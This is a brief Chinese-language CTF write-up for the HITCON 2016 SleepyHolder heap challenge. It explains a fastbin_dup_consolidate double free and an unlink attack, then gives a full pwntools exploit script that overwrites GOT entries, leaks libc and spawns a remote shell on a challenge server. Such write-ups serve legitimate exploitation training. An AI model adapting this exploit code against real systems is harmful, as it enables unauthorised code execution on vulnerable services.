sleepyHolder_hitcon_2016
查看保护
一个简单题目
这里没有清掉
攻击思路:利用fastbin_dup_consolidate这个手法实现double free。然后利用unlink攻击,改got为system发送sh即可getshell。
创建1和2类型的堆块,此时释放1,1会进fastbin。接下来申请3类型的堆,因为特别大所以1会进smallbin,此时再次释放1,就可以形成double free,申请回来1个1类型,会发现2的标志位还是0,所以可以使用unlink攻击来getshell。利用方法还挺简单的可以看z1r0’s blog,笔者blog里面讲了unlink和fastbin_dup_consolidate。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27426)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = '3. Renew secret\n'
def add(index, content):
r.sendlineafter(menu, '1')
r.sendlineafter('What secret do you want to keep?', str(index))
r.sendafter('Tell me your secret:', content)
def delete(index):
r.sendlineafter(menu, '2')
r.sendlineafter('Which Secret do you want to wipe?',str(index))
def edit(index, content):
r.sendlineafter(menu, '3')
r.sendlineafter('Which Secret do you want to renew?', str(index))
r.sendafter('Tell me your secret:', content)
add(1, 'aaaa')
add(2, 'bbbb')
delete(1)
add(3, 'cccc')
delete(1)
add(1, 'aaaa')
heap_list = 0x6020D0
fd = heap_list - 0x18
bk = heap_list - 0x10
p1 = p64(0) + p64(0x21) + p64(fd) + p64(bk) + p64(0x20)
edit(1, p1)
delete(2)
free_got = elf.got['free']
p2 = p64(0) + p64(elf.got["free"]) + p64(0) + p64(0x6020C0) + p32(1) + p32(1) + p32(1)
edit(1, p2)
edit(2, p64(elf.plt["puts"]))
edit(1, p64(elf.got["puts"]))
delete(2)
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('[+] puts_addr = ' + hex(puts_addr))
libc = ELF('./2.23/libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
atoi_got = elf.got['atoi']
system_addr = libc_base + libc.sym['system']
edit(1, p64(atoi_got) + p64(0) + p64(0x6020C0) + p32(1) * 3)
edit(2, p64(system_addr))
r.sendline('sh\x00')
r.interactive()